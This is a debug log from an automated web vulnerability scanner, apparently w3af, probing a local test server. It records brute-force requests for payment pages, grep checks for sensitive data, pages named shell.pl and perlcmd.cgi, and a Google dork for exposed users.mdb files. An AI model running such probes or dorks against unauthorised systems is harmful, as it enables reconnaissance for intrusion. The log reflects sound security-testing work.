http://localhost:9090/inc/paymentsuccessful.jsp returned HTTP code "404" (id=2690,from_cache=0,grep=1,rtt=0.12,did=LjwBpTyD) [Wed Feb 12 09:41:31 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:4 / max:50 / total:54) [Wed Feb 12 09:41:31 2020 - debug] Connections with more in use time: (62e87e81607155f6, 0.23 sec) (b6d2213d6ce83030, 0.13 sec) (51c120544df55e56, 0.10 sec) (20c6fb7a85d275d0, 0.09 sec) [Wed Feb 12 09:41:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:41:31 2020 - debug] POST http://localhost:9090/modules/payment.php3 returned HTTP code "404" (id=2689,from_cache=0,grep=1,rtt=0.14,did=w0DCWLJE) [Wed Feb 12 09:41:31 2020 - debug] motw.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] GET http://localhost:9090/includes/trxcomplete.pl returned HTTP code "404" (id=2688,from_cache=0,grep=1,rtt=0.11,did=ESL4kis9) [Wed Feb 12 09:41:31 2020 - debug] POST http://localhost:9090/module/return.php5 returned HTTP code "404" (id=2691,from_cache=0,grep=1,rtt=0.12,did=cOQVkJTa) [Wed Feb 12 09:41:31 2020 - debug] POST http://localhost:9090/module/validation.py returned HTTP code "404" (id=2692,from_cache=0,grep=1,rtt=0.06,did=XGLl1WEg) [Wed Feb 12 09:41:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] GET http://localhost:9090/modules/pay.php returned HTTP code "404" (id=2693,from_cache=0,grep=1,rtt=0.20,did=seEfikrU) [Wed Feb 12 09:41:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:31 2020 - debug] POST http://localhost:9090/servlet/pay.php4 returned HTTP code "404" (id=2694,from_cache=0,grep=1,rtt=0.13,did=2t7Vwe2Y) [Wed Feb 12 09:41:31 2020 - debug] POST http://localhost:9090/servlet/final.php returned HTTP code "404" (id=2697,from_cache=0,grep=1,rtt=0.11,did=KDGvVuQ9) [Wed Feb 12 09:41:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] GET http://localhost:9090/includes/complete.pl returned HTTP code "404" (id=2696,from_cache=0,grep=1,rtt=0.09,did=60oTQ3fB) [Wed Feb 12 09:41:32 2020 - debug] websockets_links.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] http_in_body.grep(uri="http://localhost:9090/x.php") took 0.53s to run [Wed Feb 12 09:41:32 2020 - debug] POST http://localhost:9090/libraries/valid.jsp returned HTTP code "404" (id=2698,from_cache=0,grep=1,rtt=0.35,did=uXTCUEHj) [Wed Feb 12 09:41:32 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/x.php") took 0.35s to run [Wed Feb 12 09:41:32 2020 - debug] csp.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] dom_xss.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] vulners_db.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] keys.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:32 2020 - debug] clamav.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] GET http://localhost:9090/includes/completepay.rb returned HTTP code "404" (id=2695,from_cache=0,grep=1,rtt=0.20,did=rpbZmmJV) [Wed Feb 12 09:41:32 2020 - debug] POST http://localhost:9090/servlet/successful.php3 returned HTTP code "404" (id=2699,from_cache=0,grep=1,rtt=0.08,did=oruqIYP1) [Wed Feb 12 09:41:32 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:32 2020 - debug] POST http://localhost:9090/includes/validate.jsp returned HTTP code "404" (id=2702,from_cache=0,grep=1,rtt=0.30,did=NcdfvIeh) [Wed Feb 12 09:41:32 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.pl returned HTTP code "404" (id=2703,from_cache=0,grep=1,rtt=0.11,did=SIyqnjyI) [Wed Feb 12 09:41:32 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.php4 returned HTTP code "404" (id=2701,from_cache=0,grep=1,rtt=0.32,did=rWijzfwS) [Wed Feb 12 09:41:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] objects.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] error_500.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] lang.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] ssn.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] oracle.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] feeds.grep(uri="http://localhost:9090/x.php") took 0.00s to run [Wed Feb 12 09:41:32 2020 - debug] html_comments.grep(uri="http://localhost:9090/x.php") took 0.51s to run [Wed Feb 12 09:41:32 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/x.php") took 0.53s to run [Wed Feb 12 09:41:32 2020 - debug] localhost:9090 connection pool stats (free:51 / in_use:1 / max:50 / total:52) [Wed Feb 12 09:41:32 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.04 sec) [Wed Feb 12 09:41:32 2020 - debug] POST http://localhost:9090/module/valid.aspx returned HTTP code "404" (id=2710,from_cache=0,grep=1,rtt=0.25,did=DNwCM8GX) [Wed Feb 12 09:41:33 2020 - debug] GET http://localhost:9090/libraries/validatepayment.jsp returned HTTP code "404" (id=2711,from_cache=0,grep=1,rtt=0.24,did=T75xhYQz) [Wed Feb 12 09:41:33 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/x.php") took 0.64s to run [Wed Feb 12 09:41:33 2020 - debug] get_emails.grep(uri="http://localhost:9090/shell.pl") took 2.71s to run [Wed Feb 12 09:41:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/x.php") took 0.45s to run [Wed Feb 12 09:41:33 2020 - debug] POST http://localhost:9090/inc/validate.pl returned HTTP code "404" (id=2707,from_cache=0,grep=1,rtt=0.08,did=cDDIKUdZ) [Wed Feb 12 09:41:33 2020 - debug] url_session.grep(uri="http://localhost:9090/x.php") took 0.57s to run [Wed Feb 12 09:41:33 2020 - debug] GET http://localhost:9090/inc/validatepay.pl returned HTTP code "404" (id=2708,from_cache=0,grep=1,rtt=0.14,did=dsu0TMlC) [Wed Feb 12 09:41:33 2020 - debug] GET http://localhost:9090/module/transactioncomplete.py returned HTTP code "404" (id=2714,from_cache=0,grep=1,rtt=0.22,did=TkkOt3br) [Wed Feb 12 09:41:34 2020 - debug] GET http://localhost:9090/inc/complete.php4 returned HTTP code "404" (id=2721,from_cache=0,grep=1,rtt=0.27,did=HCDZC8Ms) [Wed Feb 12 09:41:34 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/x.php") took 0.55s to run [Wed Feb 12 09:41:34 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/x.php") took 0.71s to run [Wed Feb 12 09:41:34 2020 - debug] POST http://localhost:9090/modules/completepayment.php3 returned HTTP code "404" (id=2706,from_cache=0,grep=1,rtt=0.51,did=VkTrMBIW) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.php5 returned HTTP code "404" (id=2717,from_cache=0,grep=1,rtt=0.09,did=M8S9A4xB) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/includes/trxcomplete.php3 returned HTTP code "404" (id=2716,from_cache=0,grep=1,rtt=0.20,did=3wJjD5qq) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/includes/validatepay.pl returned HTTP code "404" (id=2709,from_cache=0,grep=1,rtt=0.28,did=9O6TBlth) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/includes/completepay.php4 returned HTTP code "404" (id=2720,from_cache=0,grep=1,rtt=0.21,did=TfVgIbUs) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/modules/pay.aspx returned HTTP code "404" (id=2715,from_cache=0,grep=1,rtt=0.26,did=AKkbUdPA) [Wed Feb 12 09:41:35 2020 - debug] GET http://localhost:9090/module/validatepayment.jsp returned HTTP code "404" (id=2724,from_cache=0,grep=1,rtt=0.13,did=Eiu4zEoS) [Wed Feb 12 09:41:35 2020 - debug] GET http://localhost:9090/module/validation.py returned HTTP code "404" (id=2725,from_cache=0,grep=1,rtt=0.07,did=J6YxX4NK) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.rb returned HTTP code "404" (id=2713,from_cache=0,grep=1,rtt=0.15,did=J29CjI6H) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.php3 returned HTTP code "404" (id=2719,from_cache=0,grep=1,rtt=0.09,did=F0HzbxLM) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/libraries/validatepayment.rb returned HTTP code "404" (id=2722,from_cache=0,grep=1,rtt=0.08,did=bpybf4Z7) [Wed Feb 12 09:41:35 2020 - debug] GET http://localhost:9090/libraries/paymentsuccessful.php5 returned HTTP code "404" (id=2712,from_cache=0,grep=1,rtt=0.22,did=wN1saoaf) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.jsp returned HTTP code "404" (id=2700,from_cache=0,grep=1,rtt=0.18,did=kW3R2cBF) [Wed Feb 12 09:41:35 2020 - debug] GET http://localhost:9090/modules/validpay.jsp returned HTTP code "404" (id=2723,from_cache=0,grep=1,rtt=0.09,did=J18Pm3be) [Wed Feb 12 09:41:35 2020 - debug] POST http://localhost:9090/includes/complete.php3 returned HTTP code "404" (id=2718,from_cache=0,grep=1,rtt=0.23,did=XFEhAOwd) [Wed Feb 12 09:41:35 2020 - debug] GET http://localhost:9090/module/finished.rb returned HTTP code "404" (id=2727,from_cache=0,grep=1,rtt=0.28,did=leSUBb5D) [Wed Feb 12 09:41:38 2020 - debug] GET http://localhost:9090/module/return.php5 returned HTTP code "404" (id=2726,from_cache=0,grep=1,rtt=0.09,did=cjkF3GOo) [Wed Feb 12 09:41:38 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 141. [Wed Feb 12 09:41:38 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:38 2020 - debug] GET http://localhost:9090/inc/final.php3 returned HTTP code "404" (id=2734,from_cache=0,grep=1,rtt=0.53,did=YPPTGjsH) [Wed Feb 12 09:41:38 2020 - debug] GET http://localhost:9090/includes/validate.jsp returned HTTP code "404" (id=2736,from_cache=0,grep=1,rtt=0.25,did=09rq5huf) [Wed Feb 12 09:41:38 2020 - debug] GET http://localhost:9090/modules/paid returned HTTP code "404" (id=2730,from_cache=0,grep=1,rtt=0.29,did=4qkbNVQm) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/valid.aspx returned HTTP code "404" (id=2738,from_cache=0,grep=1,rtt=0.27,did=hRwYiiTs) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/payment.php3 returned HTTP code "404" (id=2731,from_cache=0,grep=1,rtt=0.33,did=nmZjlsMO) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/success.aspx returned HTTP code "404" (id=2729,from_cache=0,grep=1,rtt=0.27,did=La0tS6TS) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/pay.php4 returned HTTP code "404" (id=2735,from_cache=0,grep=1,rtt=0.47,did=d87EkjTa) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/libraries/valid.jsp returned HTTP code "404" (id=2733,from_cache=0,grep=1,rtt=0.20,did=gRbLfew3) [Wed Feb 12 09:41:39 2020 - debug] localhost:9090 connection pool stats (free:45 / in_use:7 / max:50 / total:52) [Wed Feb 12 09:41:39 2020 - debug] Connections with more in use time: (62e87e81607155f6, 0.19 sec) (feefb3b1646a9d56, 0.13 sec) (20c6fb7a85d275d0, 0.11 sec) (ff37903b27d7f8f9, 0.10 sec) (a5419411797e137e, 0.08 sec) [Wed Feb 12 09:41:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1226, 'reject-seen-url': 1058, 'reject-out-of-scope': 30, 'accept': 211} [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/payment.jsp returned HTTP code "404" (id=2728,from_cache=0,grep=1,rtt=0.24,did=k92rApnU) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/final.php returned HTTP code "404" (id=2732,from_cache=0,grep=1,rtt=0.18,did=P1m4wxBK) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/successful.php3 returned HTTP code "404" (id=2737,from_cache=0,grep=1,rtt=0.18,did=2KrlMFNY) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/validation.jsp returned HTTP code "404" (id=2741,from_cache=0,grep=1,rtt=0.16,did=dWMJlx85) [Wed Feb 12 09:41:39 2020 - debug] symfony.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] file_upload.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/validatepayment.rb returned HTTP code "404" (id=2745,from_cache=0,grep=1,rtt=0.29,did=LDYQty1g) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/includes/validatepay.pl returned HTTP code "404" (id=2749,from_cache=0,grep=1,rtt=0.18,did=tGTIXeKJ) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/return.php returned HTTP code "404" (id=2750,from_cache=0,grep=1,rtt=0.13,did=tPpEEBKQ) [Wed Feb 12 09:41:39 2020 - debug] private_ip.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] expect_ct.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/inc/validate.pl returned HTTP code "404" (id=2748,from_cache=0,grep=1,rtt=0.01,did=MnTPTqt5) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/inc/validatepay.php3 returned HTTP code "404" (id=2739,from_cache=0,grep=1,rtt=0.23,did=WiFF4Rij) [Wed Feb 12 09:41:39 2020 - debug] svn_users.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] motw.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] meta_generator.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] retirejs.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:39 2020 - debug] serialized_object.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] blank_body.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] credit_cards.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] websockets_links.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] csp.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] dom_xss.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] vulners_db.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] clamav.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.php3 returned HTTP code "404" (id=2742,from_cache=0,grep=1,rtt=0.10,did=JBsqAYxw) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/pay.aspx returned HTTP code "404" (id=2744,from_cache=0,grep=1,rtt=0.19,did=r0DrhgEI) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/transactioncomplete.jsp returned HTTP code "404" (id=2752,from_cache=0,grep=1,rtt=0.20,did=vuLrcdLT) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/inc/complete.php5 returned HTTP code "404" (id=2754,from_cache=0,grep=1,rtt=0.35,did=h8ckdfTw) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/includes/complete.php3 returned HTTP code "404" (id=2755,from_cache=0,grep=1,rtt=0.22,did=WOgINSeg) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/libraries/paymentsuccessful.php returned HTTP code "404" (id=2740,from_cache=0,grep=1,rtt=0.28,did=PTRTsspG) [Wed Feb 12 09:41:39 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] objects.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] error_500.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] meta_tags.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] password_profiling.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] click_jacking.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/paid.cgi returned HTTP code "404" (id=2758,from_cache=0,grep=1,rtt=0.26,did=lLOYrk6e) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/validpay.rb returned HTTP code "404" (id=2751,from_cache=0,grep=1,rtt=0.26,did=ojCHhfEr) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/libraries/validatepayment.rb returned HTTP code "404" (id=2760,from_cache=0,grep=1,rtt=0.12,did=ScF0QV3a) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/finished.php4 returned HTTP code "404" (id=2759,from_cache=0,grep=1,rtt=0.07,did=hwbIUQo0) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/includes/completepay.php4 returned HTTP code "404" (id=2761,from_cache=0,grep=1,rtt=0.33,did=QYaT2AAZ) [Wed Feb 12 09:41:39 2020 - debug] GET http://www.google.com/xhtml?q=site:localhost filetype:mdb inurl:users.mdb&start=0 returned HTTP code "429" (id=2747,from_cache=0,grep=1,rtt=0.27,did=Eq6emcUO) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/success.pl returned HTTP code "404" (id=2764,from_cache=0,grep=1,rtt=0.11,did=OdRNXYQT) [Wed Feb 12 09:41:39 2020 - debug] keys.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.18s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/inc/completepayment returned HTTP code "404" (id=2757,from_cache=0,grep=1,rtt=0.17,did=kYB2IgOA) [Wed Feb 12 09:41:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1234, 'reject-seen-url': 1075, 'reject-out-of-scope': 30, 'accept': 211} [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/success returned HTTP code "404" (id=2762,from_cache=0,grep=1,rtt=0.16,did=AixaT3Zo) [Wed Feb 12 09:41:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1234, 'reject-seen-url': 1075, 'reject-out-of-scope': 30, 'accept': 211} [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/servlet/final.aspx returned HTTP code "404" (id=2765,from_cache=0,grep=1,rtt=0.28,did=EaBf21JC) [Wed Feb 12 09:41:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1234, 'reject-seen-url': 1075, 'reject-out-of-scope': 30, 'accept': 211} [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.php5 returned HTTP code "404" (id=2743,from_cache=0,grep=1,rtt=0.08,did=eI69PSwy) [Wed Feb 12 09:41:39 2020 - debug] lang.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/servlet/pay.php5 returned HTTP code "404" (id=2756,from_cache=0,grep=1,rtt=0.06,did=ndvA9LRa) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.rb returned HTTP code "404" (id=2753,from_cache=0,grep=1,rtt=0.32,did=bzI9dh30) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/includes/trxcomplete.php3 returned HTTP code "404" (id=2763,from_cache=0,grep=1,rtt=0.16,did=sSJCEYoM) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.jsp returned HTTP code "404" (id=2767,from_cache=0,grep=1,rtt=0.18,did=amOdfLTV) [Wed Feb 12 09:41:39 2020 - debug] error_pages.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.01s to run [Wed Feb 12 09:41:39 2020 - debug] strange_reason.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/includes/validate.rb returned HTTP code "404" (id=2768,from_cache=0,grep=1,rtt=0.06,did=9m9JaOwN) [Wed Feb 12 09:41:39 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:41:39 2020 - debug] localhost:9090 connection pool stats (free:53 / in_use:0 / max:50 / total:53) [Wed Feb 12 09:41:39 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.08 sec) (62e87e81607155f6, 0.07 sec) (feefb3b1646a9d56, 0.07 sec) (20c6fb7a85d275d0, 0.03 sec) (ff37903b27d7f8f9, 0.02 sec) [Wed Feb 12 09:41:39 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 140. [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/servlet/paid returned HTTP code "404" (id=2770,from_cache=0,grep=1,rtt=0.16,did=mPLUFGxY) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/valid.pl returned HTTP code "404" (id=2766,from_cache=0,grep=1,rtt=0.25,did=ONyUyXC3) [Wed Feb 12 09:41:39 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:41:39 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] cache_control.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] strange_headers.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] ssn.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] oracle.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] feeds.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/libraries/valid.rb returned HTTP code "404" (id=2769,from_cache=0,grep=1,rtt=0.09,did=ku6yy427) [Wed Feb 12 09:41:39 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:41:39 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: IUFRf5gL) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/servlet/payment.rb returned HTTP code "404" (id=2773,from_cache=0,grep=1,rtt=0.21,did=VqlmFXiF) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/pay.pl returned HTTP code "404" (id=2771,from_cache=0,grep=1,rtt=0.12,did=VRiGLcxA) [Wed Feb 12 09:41:39 2020 - debug] get_emails.grep(uri="http://localhost:9090/x.php") took 2.95s to run [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.16s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/includes/validatepay.php3 returned HTTP code "404" (id=2772,from_cache=0,grep=1,rtt=0.09,did=ox1vKxDD) [Wed Feb 12 09:41:39 2020 - debug] http_in_body.grep(uri="http://localhost:9090/perlcmd.cgi") took 1.00s to run [Wed Feb 12 09:41:39 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/perlcmd.cgi") took 1.00s to run [Wed Feb 12 09:41:39 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.99s to run [Wed Feb 12 09:41:39 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.93s to run [Wed Feb 12 09:41:39 2020 - debug] html_comments.grep(uri="http://localhost:9090/perlcmd.cgi") took 1.02s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/validation.jsp returned HTTP code "404" 